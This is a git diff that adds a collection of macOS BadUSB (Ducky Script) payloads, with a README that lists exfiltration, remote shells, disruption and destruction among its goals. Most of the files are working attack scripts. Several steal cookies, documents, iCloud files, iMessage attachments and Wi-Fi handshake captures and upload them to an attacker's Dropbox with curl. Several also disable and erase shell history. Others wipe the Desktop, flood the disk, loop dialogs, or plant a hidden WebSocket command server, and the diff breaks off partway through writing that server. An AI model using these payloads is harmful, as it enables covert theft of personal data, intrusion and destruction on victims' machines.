diff --git a/BadUSB/MacOS-narstybits/Executions Readme.md b/BadUSB/MacOS-narstybits/Executions Readme.md new file mode 100644 index 00000000..d558a753 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions Readme.md @@ -0,0 +1,88 @@ + + + + + + + + + + + + + Coding + + +

+

Welcome to the Executions Folder!

+ +The Executions Folder is dedicated to penetration testing and security assessments using Ducky scripts. It provides information, resources, and tools related to executing security tests and evaluating system vulnerabilities.

+

+ +

Introduction +
+ Coding +
+

Penetration testing, also known as ethical hacking, is a process of evaluating the security of a system or network by simulating real-world attacks. This section aims to guide you through the process of executing security tests using Ducky scripts.

+ +

Types of Executions +
+ Coding +
+

+ +
    +
  1. Load Testing: This tests how well a system can handle heavy traffic or data processing. It helps find weak points in the system's performance.
  2. +
  3. Data Exfiltration to Dropbox or iPhone: This involves taking data from a target system and uploading it to a Dropbox account or sending it to an iPhone. This can be used to steal information or disrupt the target's operations.
  4. +
  5. Personal Information Gathering: This involves finding personal details about a target. These details can be used to gain unauthorized access to systems or for identity theft.
  6. +
  7. Remote Shell: This involves gaining control of a target system's command line from a remote location. This allows an attacker to execute commands and manipulate the system without being physically present.
  8. +
  9. System Disruption: This involves causing problems for a target system, like making it unavailable or causing it to malfunction.
  10. +
  11. System Destruction: This is a severe attack that causes permanent damage to a target system, like deleting important files or damaging hardware.
  12. +
+
+

+ +

Tools +
+ Coding +
+

+ +

+ + + +

Resources +
+ Coding +
+

Here are some additional resources to learn more about penetration testing/executions and Ducky scripting:

+ +

+ +

+ + + +
+ Coding +
+ diff --git a/BadUSB/MacOS-narstybits/Executions/ Delete Copy Pasta.txt b/BadUSB/MacOS-narstybits/Executions/ Delete Copy Pasta.txt new file mode 100644 index 00000000..1873deae --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/ Delete Copy Pasta.txt @@ -0,0 +1,21 @@ +REM Deletes the hidden folder ~/.copypasta +REM To be used with copy pasta script + + +REM Author: Narsty +REM Title: Delete Copy Pasta +REM Target: MacOS +REM Version: 1.0 +REM Category: Executions + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING rm -rf ~/.copypasta +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/Executions/Bluetooth On.txt b/BadUSB/MacOS-narstybits/Executions/Bluetooth On.txt new file mode 100644 index 00000000..e8013ca4 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Bluetooth On.txt @@ -0,0 +1,26 @@ +REM Title: BLUETOOTH ON +REM Author: NARSTY +REM Description: Opens spotlight, searches for bluetooth file exchange +REM and turns bluetooth on +REM using the Macs built in bluetooth File Exchange +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 1000 +STRING bluetooth File Exchange +DELAY 1000 +ENTER +DELAY 1000 +ENTER +DELAY 2000 +TAB +DELAY 2000 +SPACE +DELAY 1000 +GUI W + diff --git a/BadUSB/MacOS-narstybits/Executions/Cookies to Dropbox.txt b/BadUSB/MacOS-narstybits/Executions/Cookies to Dropbox.txt new file mode 100644 index 00000000..643d672a --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Cookies to Dropbox.txt @@ -0,0 +1,97 @@ +REM This Script will copy the Cookies folder and send them to your dropbox API +REM Replace '' with the systems actual username +REM Replace '' with your actual Dropbox API key + + +REM Here's the breakdown, we navigate to the finder +REM use the Shift GUI G to open up the "go to folder" menu. +REM Then we search for & open the library folder. +REM Now we can type "cook" to navigate to the cookies folder +REM we copy it and navigate to a new window to paste the folder +REM Then we zip the folder and send it to the dropbox +REM Using the nohup and & to make sure the code is executed + +REM Requirements Must have at least two windows open +REM Dropbox API key and targets system username + + +REM Author: Narsty +REM Title: Cookies to Dropbox +REM Version 1.0 MacOs +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Finder +DELAY 1000 +ENTER +DELAY 2000 +GUI-SHIFT g +DELAY 1000 +STRING /Users//Library +DELAY 500 +ENTER +DELAY 1000 +STRING cook +DELAY 500 +GUI c +DELAY 500 +CTRL RIGHTARROW +DELAY 1000 +GUI v +DELAY 4000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +CTRL c +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING echo 'cd ~/Desktop && zip -r cookies.zip cookies && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/cookies.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @cookies.zip' > upload.sh +DELAY 1000 +ENTER +DELAY 2000 +STRING chmod +x upload.sh +DELAY 500 +ENTER +DELAY 500 +STRING nohup ./upload.sh >/dev/null 2>&1 & +DELAY 500 +ENTER +DELAY 1000 +CTRL C +DELAY 500 +STRING rm -r ~/Desktop/cookies +DELAY 1000 +ENTER +DELAY 500 +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 5000 +STRING rm -r ~/Desktop/cookies.zip +ENTER +DELAY 500 +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +STRING rm ~/.bash_history +DELAY 500 +GUI w +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/Executions/Copy Pasta.txt b/BadUSB/MacOS-narstybits/Executions/Copy Pasta.txt new file mode 100644 index 00000000..335f974e --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Copy Pasta.txt @@ -0,0 +1,32 @@ +REM Creates Hidden Folder and Copies Desktop Contents +REM To find the folder follow the steps below. + +REM Open Finder. +REM Click on "Go" in the menu bar at the top of the screen. +REM Select "Go to Folder" from the dropdown menu. +REM In the "Go to the folder" dialog box, enter '~/.copypasta' and click "Go". + +REM Author: Narsty +REM Title: Dark Mode Toggler +REM Target: MacOS +REM Version: 1.0 +REM Category: Executions + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING mkdir ~/.copypasta +DELAY 500 +ENTER +DELAY 500 +STRING cp -R ~/Desktop/* ~/.copypasta/ +DELAY 500 +ENTER +DELAY 500 +GUI W diff --git a/BadUSB/MacOS-narstybits/Executions/DarkStorm bruteforce I.P.txt b/BadUSB/MacOS-narstybits/Executions/DarkStorm bruteforce I.P.txt new file mode 100644 index 00000000..a9d0d0c0 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/DarkStorm bruteforce I.P.txt @@ -0,0 +1,55 @@ +REM The script will open the Terminal, +REM execute the nmap command to scan for open ports, +REM run nikto for web server vulnerability scanning. +REM Runs Zap to test for Network vulerabilities, prints report to Desktop. You can change location to your flipper on line 48. +REM Tshark command-line tool for capturing and analyzing network traffic. Will create a new file named capture.pcap on your desktop +REM You can change location to your flipper on line 51. +REM Finally the script performs directory and file brute-forcing with gobuster and password files +REM Must store password file on Desktop and name it "common.txt" + + + +REM nmap, nikto, and gobuster can all be downloaded using homebrew/terminal +REM command 'brew install nmap && brew install nikto && brew install gobuster' + +REM Download wireshark to use the terminal Tshark command +REM Download the OWASP ZAP.app file from the official OWASP ZAP website + + +REM nikto command will not execute if you don't have the correct port assigned! +REM verify that the web server is indeed running on an open port +REM as indicated by the Nmap scan, before using the code! +REM Line 45 should look like this after port # is inserted "STRING nikto -h 13.371.118.34 -p 73" +REM To use this script, replace <13.371.118.34 with target_ip> + + + +REM Author: Narsty +REM Title: DarkStorm bruteforce +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING nmap -p 1-1000 -T4 -Pn 13.371.118.34 +ENTER +DELAY 7000 +STRING nikto -h 13.371.118.34 -p +ENTER +DELAY 7000 +STRING /Applications/OWASP\ ZAP.app/Contents/Java/zap.sh -cmd -quickurl http://13.371.118.34 -quickout ~/Desktop/quick_scan_results.html +ENTER +DELAY 7000 +STRING tshark -i en0 -w ~/Desktop/capture.pcap +ENTER +DELAY 7000 +STRING gobuster dir -u http://13.371.118.34 -w ~/Desktop/common.txt -t 50 -q +ENTER diff --git a/BadUSB/MacOS-narstybits/Executions/Desktop Deletion V2.txt b/BadUSB/MacOS-narstybits/Executions/Desktop Deletion V2.txt new file mode 100644 index 00000000..a14a1e67 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Desktop Deletion V2.txt @@ -0,0 +1,24 @@ +REM Title: Desktop Deletion +REM Author: NARSTY +REM Description: Opens Terminal and enters commands to delete ALL files and folders located on Desktop +REM Please exercise caution when using this command +REM It will permanently delete all files & Folder on the desktop without any confirmation prompts +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 300 +GUI SPACE +DELAY 500 +STRING terminal.app +DELAY 1000 +ENTER +DELAY 1000 +STRING rm -rf ~/Desktop/* +DELAY 2000 +ENTER +DELAY 2000 +GUI W + diff --git a/BadUSB/MacOS-narstybits/Executions/Desktop Deletion.txt b/BadUSB/MacOS-narstybits/Executions/Desktop Deletion.txt new file mode 100644 index 00000000..9e0e547d --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Desktop Deletion.txt @@ -0,0 +1,24 @@ +REM Title: Desktop Deletion +REM Author: NARSTY +REM Description: Opens Terminal and enters commands to delete files located on Desktop +REM Please exercise caution when using this command +REM It will permanently delete all files on the desktop without any confirmation prompts +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 300 +GUI SPACE +DELAY 500 +STRING terminal.app +DELAY 1000 +ENTER +DELAY 1000 +STRING rm ~/Desktop/* +DELAY 2000 +ENTER +DELAY 2000 +GUI W + diff --git a/BadUSB/MacOS-narstybits/Executions/Docs and Desktop to Dropbox API.txt b/BadUSB/MacOS-narstybits/Executions/Docs and Desktop to Dropbox API.txt new file mode 100644 index 00000000..4a38297f --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Docs and Desktop to Dropbox API.txt @@ -0,0 +1,73 @@ +REM This script will create a folder on the desktop named "backup" +REM it will then copy the Documents and Desktop contents to the folder and create a .zip +REM Once the zip is created it will proceed to send all the contents to your Dropbox +REM you MUST replace "" with your actual API accesss token + + +REM Title: Docs and Desktop to Dropbox API +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING mkdir -p ~/Desktop/Backup/Desktop +ENTER +DELAY 500 +STRING mkdir -p ~/Desktop/Backup/Documents +ENTER +DELAY 500 +STRING cp -R ~/Documents/* ~/Desktop/Backup/Documents/ +ENTER +DELAY 500 +STRING cp -R ~/Desktop/* ~/Desktop/Backup/Desktop/ +ENTER +DELAY 500 +STRING echo 'cd ~/Desktop/Backup && zip -r backup.zip . && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip' > upload.sh +ENTER +DELAY 2500 +ENTER +STRING chmod +x upload.sh +ENTER +DELAY 500 +STRING nohup ./upload.sh >/dev/null 2>&1 & +ENTER +DELAY 500 +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 5000 +STRING rm -r ~/Desktop/backup +DELAY 500 +ENTER +DELAY 5000 +STRING rm backup.zip +DELAY 500 +ENTER +DELAY 500 +STRING clear +DELAY 500 +ENTER +DELAY 250 +GUI w +DELAY 1000 +ENTER +DELAY 250 +ENTER diff --git a/BadUSB/MacOS-narstybits/Executions/Dropbox to Desktop Bomb.txt b/BadUSB/MacOS-narstybits/Executions/Dropbox to Desktop Bomb.txt new file mode 100644 index 00000000..552f149e --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Dropbox to Desktop Bomb.txt @@ -0,0 +1,46 @@ +REM This script can be used to download files from dropbox to a target MacOs Desktop. +REM files downloaded to the desktop can be used to trigger more complex scripts for further exploitation + +REM Author: Narsty +REM Title: Dropbox to Desktop Bomb +REM Version 1.0 MacOs +REM Category: Execution + + +REM Replace the "" Placeholder with your actual Dropbox API token +REM Replace "" with the URL of the dropbox file +REM Replace the "" placeholder +REM with what you want the name of the file to be on the target desktop +REM Must include file format (.jpeg .doc .txt .mp4) + + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +ENTER +DELAY 1000 +STRING cd ~/Desktop +ENTER +DELAY 500 +STRING echo 'ACCESS_TOKEN=""; DOWNLOAD_URL=""; SAVE_PATH="$HOME/Desktop/"; curl -L -o "$SAVE_PATH" --header "Authorization: Bearer $ACCESS_TOKEN" "$DOWNLOAD_URL"' > download.sh +DELAY 500 +STRING chmod +x download.sh +DELAY 500 +STRING ./download.sh +DELAY 250 +ENTER +DELAY 7000 +GUI w diff --git a/BadUSB/MacOS-narstybits/Executions/EAPOL Handshake to Dropbox.txt b/BadUSB/MacOS-narstybits/Executions/EAPOL Handshake to Dropbox.txt new file mode 100644 index 00000000..060a57c7 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/EAPOL Handshake to Dropbox.txt @@ -0,0 +1,76 @@ +REM This script discreetly grabs the .PCAP that will contain the FOUR EAPOL handshake keys +REM then zips the file renaming it Captured Handshake and sends it directly to your dropbox API. +REM Replace '' with your actual API access token. + +REM Requirements Wireshark (tshark) can download using the command 'brew install wireshark' +REM Dropbox API token, you can find Documentation under my Executions readme. + + +REM Author: Narsty +REM Title: EAPOL Handshake to Dropbox +REM Version 1.0 MacOs +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 2000 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING networksetup -setairportpower en0 off +DELAY 500 +ENTER +DELAY 1000 +STRING tshark -i en0 -w ~/Desktop/captured.pcap & +DELAY 1000 +ENTER +DELAY 6000 +STRING networksetup -setairportpower en0 on +DELAY 500 +ENTER +DELAY 3000 +STRING pkill -f tshark +DELAY 500 +ENTER +DELAY 500 +CTRL c +DELAY 2000 +STRING echo 'cd ~/Desktop && zip -r "CapturedHandshake.zip" captured.pcap && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/CapturedHandshake.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @"CapturedHandshake.zip"' > upload.sh +DELAY 500 +ENTER +DELAY 500 +STRING chmod +x upload.sh +ENTER +DELAY 500 +STRING nohup ./upload.sh >/dev/null 2>&1 & +DELAY 500 +ENTER +DELAY 10000 +STRING rm ~/Desktop/captured.pcap +DELAY 500 +ENTER +STRING rm ~/Desktop/CapturedHandshake.zip +DELAY 500 +ENTER +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 5000 +GUI w +DELAY 500 +ENTER + + diff --git a/BadUSB/MacOS-narstybits/Executions/Eject DiskUtility.txt b/BadUSB/MacOS-narstybits/Executions/Eject DiskUtility.txt new file mode 100644 index 00000000..ab493ef8 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Eject DiskUtility.txt @@ -0,0 +1,24 @@ +REM Title: Ejcect Disk Utility +REM Author: NARSTY +REM Description: Opens Disk Utility and Ejects The Second Order Disk. +REM Will NOT work if programs are open during execution, please use responsibly +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING Disk Utility +DELAY 1000 +ENTER +DELAY 1000 +GUI DOWNARROW +DELAY 500 +ENTER +DELAY 500 +GUI E +DELAY 500 +ENTER +GUI q diff --git a/BadUSB/MacOS-narstybits/Executions/File load Tester.txt b/BadUSB/MacOS-narstybits/Executions/File load Tester.txt new file mode 100644 index 00000000..4575a2db --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/File load Tester.txt @@ -0,0 +1,23 @@ +REM Creates 100 Files each containing 30MB of random data on the Desktop +REM Can modify the count=30 parameter to change the amount of MB in each file +REM Can modify the '100' to change the number of files created + +REM please be EXTREMELY careful with load testing scripts as they can damage your system + +REM Author: Narsty +REM Title: File load Tester +REM Target: MacOS +REM Version: 1.0 +REM Category: Executions + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING cd ~/Desktop && for i in {1..100}; do dd if=/dev/random of=file$i bs=1m count=30; done +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/Executions/Folder Fun Load tester.txt b/BadUSB/MacOS-narstybits/Executions/Folder Fun Load tester.txt new file mode 100644 index 00000000..fe187f51 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Folder Fun Load tester.txt @@ -0,0 +1,22 @@ +REM Creates 400 Folders on the Desktop +REM Can adjust the number "400" to change the numbers of folders created + +REM please be EXTREMELY careful with load testing scripts as they can damage your system + +REM Author: Narsty +REM Title: Folder Fun +REM Target: MacOS +REM Version: 1.0 +REM Category: Executions + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING mkdir ~/Desktop/FunFolders{1..400} +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/Executions/Icloud Documents to Dropbox .txt b/BadUSB/MacOS-narstybits/Executions/Icloud Documents to Dropbox .txt new file mode 100644 index 00000000..9689e0fa --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Icloud Documents to Dropbox .txt @@ -0,0 +1,90 @@ +REM This Script will copy the Documents folder in Icloud and send them to your dropbox API +REM Replace '' with the systems actual username +REM Replace '' with your actual Dropbox API key + + +REM Here's the breakdown, we navigate to the finder +REM use the Shift GUI G to open up the "go to folder" menu. +REM Then we search for & open the mobile iCloud folder. +REM Now we can type "do" to navigate to the Documents folder +REM we copy it and navigate to a new window to paste the folder +REM Then we zip the folder and send it to the dropbox +REM Using the nohup and & to make sure the code is executed + +REM Requirements Must have at least two windows open +REM Dropbox API key and targets system username + +REM Author: Narsty +REM Title: iCloud Documents to Dropbox +REM Version 2.0 MacOs +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Finder +DELAY 1000 +ENTER +DELAY 2000 +GUI-SHIFT g +DELAY 1000 +STRING /Users//Library/mobile +DELAY 500 +ENTER +DELAY 1000 +STRING do +DELAY 500 +GUI c +DELAY 500 +CTRL RIGHTARROW +DELAY 1000 +GUI v +DELAY 15000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +CTRL c +DELAY 1000 +STRING echo 'cd ~/Desktop && zip -r Documents.zip Documents && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Documents.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @Documents.zip' > upload.sh +DELAY 1000 +ENTER +DELAY 2000 +STRING chmod +x upload.sh +DELAY 500 +ENTER +DELAY 500 +STRING ./upload.sh +DELAY 500 +ENTER +DELAY 7000 +CTRL C +DELAY 500 +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 500 +STRING rm -r ~/Desktop/Documents.zip +ENTER +DELAY 500 +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +GUI w +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/Executions/Imessage Attachments to Dropbox.txt b/BadUSB/MacOS-narstybits/Executions/Imessage Attachments to Dropbox.txt new file mode 100644 index 00000000..3ae44203 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Imessage Attachments to Dropbox.txt @@ -0,0 +1,89 @@ +REM This Script will copy all the attachments in the messages app and send them to your dropbox API +REM Replace '' with the systems actual username +REM Replace "' with your actual Dropbox API key + + +REM Here's the breakdown, we simply navigate to the finder +REM use the Shift GUI G to open up the "go to folder" menu. +REM Then we search for & open the messages folder. +REM Now we can tab to the attachments folder copy it and navigate to a new window to paste the folder +REM Then we zip the folder and send it to the dropbox +REM Using the nohup and & to make sure the code is executed +REM even when closing out of the terminal. + +REM Requirements Must have at least two windows open +REM Dropbox API key and targets system username + +REM Author: Narsty +REM Title: Imessage Attachments to Dropbox +REM Version 2.0 MacOs +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Finder +DELAY 1000 +ENTER +DELAY 2000 +GUI-SHIFT g +DELAY 1000 +STRING /Users//Library/Messages/ +DELAY 500 +ENTER +DELAY 1000 +STRING at +DELAY 500 +GUI c +DELAY 250 +CTRL RIGHTARROW +DELAY 1000 +GUI v +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +CTRL c +DELAY 1000 +STRING echo 'cd ~/Desktop && zip -r attachments.zip Attachments && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/attachments.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @attachments.zip' > upload.sh +DELAY 2000 +ENTER +DELAY 500 +STRING chmod +x upload.sh +DELAY 500 +ENTER +DELAY 500 +STRING nohup ./upload.sh >/dev/null 2>&1 & +DELAY 500 +ENTER +DELAY 2000 +CTRL C +DELAY 500 +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 500 +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +GUI w +DELAY 500 +ENTER + + diff --git a/BadUSB/MacOS-narstybits/Executions/Infinite Dialog Box.txt b/BadUSB/MacOS-narstybits/Executions/Infinite Dialog Box.txt new file mode 100644 index 00000000..ce5212f2 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Infinite Dialog Box.txt @@ -0,0 +1,32 @@ +REM This script opens an infinite dialog box on MacOS +REM that continuously displays the message "I'll Never Leave" with an "OK" button. +REM It runs in the background using the nohup command. +REM The script then clears the terminal and exits. + + + +REM To end the loop you need to Kill the PID +REM In the terminal, use the command "pgrep osascript" to find the PID of the dialog box loop +REM Run the command 'Kill PID #' to end the dialog box loop + + +REM Author: Narsty +REM Title: Infinite Dialog Box +REM Target: MacOS +REM Version: 1.0 +REM Category: Executions + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING nohup osascript -e 'repeat' -e 'set dialogResult to button returned of (display dialog "I'"'"'ll Never Leave" buttons {"Option 1", "Option 2", "Option 3"} default button 1)' -e 'end repeat' >/dev/null 2>&1 & +DELAY 500 +GUI k +DELAY 500 +GUI w + diff --git a/BadUSB/MacOS-narstybits/Executions/Infinite Dropdown list.txt b/BadUSB/MacOS-narstybits/Executions/Infinite Dropdown list.txt new file mode 100644 index 00000000..824109d9 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Infinite Dropdown list.txt @@ -0,0 +1,33 @@ +REM This script opens an Infinite Dropdown list on MacOS +REM that continuously displays the message "I'll Never Leave" +REM with a list of selectable option and "Ill Never Leave" button. +REM It runs in the background using the nohup command. +REM The script then clears the terminal and exits. + + + +REM To end the loop you need to Kill the PID +REM In the terminal, use the command "pgrep osascript" to find the PID of the dialog box loop +REM Run the command 'Kill PID #' to end the dialog box loop + + +REM Author: Narsty +REM Title: Infinite Dropdown list +REM Target: MacOS +REM Version: 1.0 +REM Category: Executions + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING nohup osascript -e 'repeat' -e 'set dialogResult to button returned of (display dialog "I'"'"'ll Never Leave" buttons {"Option 1", "Option 2", "Option 3"} default button 1)' -e 'end repeat' >/dev/null 2>&1 & +DELAY 500 +GUI k +DELAY 500 +GUI w + diff --git a/BadUSB/MacOS-narstybits/Executions/MacOs Website redirect.txt b/BadUSB/MacOS-narstybits/Executions/MacOs Website redirect.txt new file mode 100644 index 00000000..ea8dff54 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/MacOs Website redirect.txt @@ -0,0 +1,20 @@ +REM Description: Opens Terminal and redirects to URL of choice +REM You must enter the desired website in the Url String DO NOT remove single Quotes! + +REM Title: Website Redirect +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING open -a Safari 'Enter URL/Website here' +DELAY 1000 +ENTER diff --git a/BadUSB/MacOS-narstybits/Executions/NEVER SLEEP.txt b/BadUSB/MacOS-narstybits/Executions/NEVER SLEEP.txt new file mode 100644 index 00000000..88c20625 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/NEVER SLEEP.txt @@ -0,0 +1,37 @@ +REM This script uses the caffeinate command +REM to keep the MacOS system from going to sleep. +REM To undo this you must kill the PID using the command 'kill PID#' +REM To find the PID use the following command 'ps aux | grep caffeinate' + + +REM Author: Narsty +REM Title: Never Sleep +REM Target: MacOS +REM Version: 1.0 +REM Category: Executions + + + +DELAY 500 +GUI SPACE +DELAY 500 +STRING TERMINAL +DELAY 1000 +ENTER +DELAY 1000 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +STRING NOHUP caffeinate -s & +DELAY 500 +ENTER +DELAY 500 +GUI W +DELAY 500 +ENTER + diff --git a/BadUSB/MacOS-narstybits/Executions/Remote Shell.txt b/BadUSB/MacOS-narstybits/Executions/Remote Shell.txt new file mode 100644 index 00000000..21d31db0 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Executions/Remote Shell.txt @@ -0,0 +1,61 @@ +REM Creates a hidden directory in the home directory named .phantom_ws. +REM Navigates into the new directory. +REM Writes a Python script (server.py) +REM This sets up a WebSocket server and allows command execution from received WebSocket messages. +REM Starts the Python script in the background with nohup, suppressing all output. +REM Clears the terminal history and exits the terminal. + + + +REM to connect to the shell remotley: 'brew install websocat' +REM After you've installed websocat, +REM you can connect to your WebSocket server like this: 'websocat ws://localhost:8765' +REM Replace "localhost" with targets I.P. address +REM Once connected, you can type a command and press Enter to send it. +REM The server will execute the command and send back the output. +REM To shut down the server, use the kill command with the PID +REM Replace 12345 with the actual PID from your 'kill 12345' + +REM Requirements: Homebrew/python3/websocat +REM Python 3 and websockets library need to be installed on the systemTerminal +REM command 'pip3 install websockets' + + +REM Title: Remote Shell +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Execution + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING mkdir ~/.phantom_ws && cd ~/.phantom_ws +ENTER +DELAY 500 +STRING echo 'import asyncio\nimport websockets\nimport subprocess\n\nasync def execute_command(websocket, 